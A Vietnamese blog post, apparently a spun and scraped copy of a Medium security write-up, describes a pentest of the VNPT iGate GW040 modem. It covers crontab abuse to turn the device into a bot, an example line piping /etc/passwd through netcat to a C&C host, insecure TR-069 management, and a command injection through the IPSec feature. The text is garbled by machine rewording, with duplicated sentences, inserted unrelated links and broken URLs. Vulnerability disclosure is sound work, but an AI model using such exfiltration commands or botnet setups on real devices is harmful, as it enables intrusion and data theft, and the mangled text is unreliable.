Cập Nhật Firmware G6 – Lỗ Hổng Trên Modem Igate, Dòng Ont Igate Gw040 – Links Hay

Đang xem : Cập nhật firmware g6
Về cơ bản đây là 1 mẫu sản phẩm của người Việt làm ra, bọn mình thực thi pentest không vì bất kỳ mục đích xấu nào ngoài mục tiêu muốn mẫu sản phẩm được ngày càng tốt lên .
Bài này mình đã tiến hành nhanh từ hồi cuối tháng 10/2017 từ 1 lời thử thách của ông anh trong team ( Các bạn trọn vẹn hoàn toàn có thể đọc qua một chút ít thông tin trước tại đây : https://linkshay.com/a-quick-look-at-igate-gw040-gpon-ont-from-vnpt-e84030bb8699 ) tuy nhiên do có 1 vài yếu tố về policy mà đến giờ mới public được. Đang xem : Cập nhật firmware g6Về cơ bản đây là 1 mẫu mẫu sản phẩm của người Việt làm ra, bọn mình thực thi pentest không vì bất kỳ mục đích xấu nào ngoài tiềm năng muốn mẫu loại sản phẩm được ngày càng tốt lên .

Tiếng sét ái tình từ cái nhìn đầu tiên

Theo kinh nghiệm tay nghề kinh nghiệm tay nghề bản thân thử lượn lờ vào trang quản trị xem có đoạn nào khả dĩ trọn vẹn hoàn toàn có thể tương tác được với OS hay không, lướt nhanh 1 cái thấy ngay tính năng này .

*

Không rõ mục tiêu của những bạn tăng trưởng như thế nào nhưng qua tính năng này thật quá đơn thuần để tạo botnet mà chẳng cần mất công code, tận dụng tính năng crontab này mình hoàn toàn có thể setup nhu yếu thiết bị định kỳ connect back về server lấy 1 đoạn script và chạy nó. Như ở trên là mình thử đặt cứ 1 phút 1 lần lên trang C&C lấy và chạy file a .
VD nội dung file a :
Cat / etc / passwd | nc c.and. c 77
Thì sẽ được :

*

*

Quản trị hay bị quản trị ?

Dò tiếp 1 chút thì thấy tính năng Tr069 :

*

*

Đây là công dụng cho phép nhà mạng quản trị thiết bị từ xa ( theo dõi thông số kỹ thuật hoạt đông, tăng cấp, thông số kỹ thuật … )
Có 3 yếu tố ở công dụng này :
– Server không sử dụng https .
– Thiết bị không xác nhận server .
– Người dùng có quyền thông số kỹ thuật địa chỉ ACS server ( chả hiểu có ông người mua nào có nhu yếu tự dựng server quản trị riêng hay không ) .
Kết hợp cả 3 yếu tố thì tính năng này không khác gì công dụng crontab ở bên trên, nghĩa là nếu bị hack thì thiết bị trọn vẹn hoàn toàn có thể bị trỏ về ACS của hacker và biến modem trở thành bot .
Xem thêm : Top 10 Thức Ăn Tốt Nhất Cho Chó Giá Rẻ, Just A Moment

Có thể bạn quan tâm  Mua Camera Mô Hình Bền Đẹp, Giá Tốt | Khuyến Mãi Tháng 12/2021

Phân tích binary

Các bạn hoàn toàn có thể tải firmware tại
https://linkshay.comvnpt.toptotnhat.comspot.com/2017/02/cap-nhat-firmware-g616a04rtm-update.html
sử dụng binwalk để extrart firmware :

Firmware sử dụng định dạng ubifs ( read only file system ) và 1 vùng jffs2 chắc để lưu volatile variables .
Sau khi extrart duyệt qua filesystem 1 chút, lấy được file / bin / httpd .
Hơi giật mình khi biên dịch ngược code những bạn có enable cờ bảo vệ stack, chắc cũng đã được apply 1 cái coding convention nào đấy rồi, hơn hẳn mấy con modem tàu mình nghịch trước đây => very good ! .

Ngồi đọc dạo qua binary 1 vòng phát hiện 1 đoạn code gọi hàm system với tham số truyền từ bên ngoài vào .
Trace ngược lại chút thì đoạn code này được sử dụng cho tính năng IPSec trọn vẹn hoàn toàn có thể trigger bằng request add new ipsec connection .
Chỉnh sửa request :
Xem thêm : Bông Hoa Đỏ
Và hiệu suất cao :

Kết luận:

Đây là một loại mẫu sản phẩm khá tốt và có vẻ như như cũng đã quan tâm đến yếu tố ATTT, tuy nhiên mình có 1 xúc cảm thiết bị chưa thực sự được chú trọng ở khâu phong thái phong cách thiết kế khi chắp vá cóp nhặt những hiệu quả của những thiết bị khác mà không có cái nhìn về mạng lưới mạng lưới hệ thống dẫn đến nhưng lỗi cơ bản về ATTT không đáng có. Hơi đáng tiếc 🙁

toptotnhat.com

It’s all about security

Follow
18

18 claps
18 claps
Written by

TigerPuma

Follow
Follow

toptotnhat.com

Follow
It’s all about security
Follow
Written by

TigerPuma

Follow

toptotnhat.com

Follow
It’s all about security

More From Medium

CVE-2021 – 26833 : Cleartext Storage in a File or on Disk in TimelyBills ≤ 1.7.0

BeeFaauBee

Introducing thin-edge.io !

Andrej Schreiner in thin-edge.io

100 Words On … .. Server Application Hardening

Digitally Vicarious in The 100 Words Project

Running Flutter Apps on Ubuntu Core

Buğra Aydoğar in Nerd For Tech

100 Words On … .. Sandboxing

Digitally Vicarious in The 100 Words Project

The Simple 40 Minute Morning Routine That Completely Changed My Life

Ashley Richmond in Change Your Mind Change Your Life

5 Underrated Reasons a Man Leaves a Good Woman

Leah Njoki in Hello, Love

The Children of the 7 Most Powerful Nazi Leaders

Peter Preskar in History of Yesterday

Learn more .

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Make Medium yours .Xem thêm : vieệc làm tốt nhất

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

Share your thinking .

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and không lấy phí to post your thinking on any topic. Write on Medium

Source: https://linkshay.com
Category: Review

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *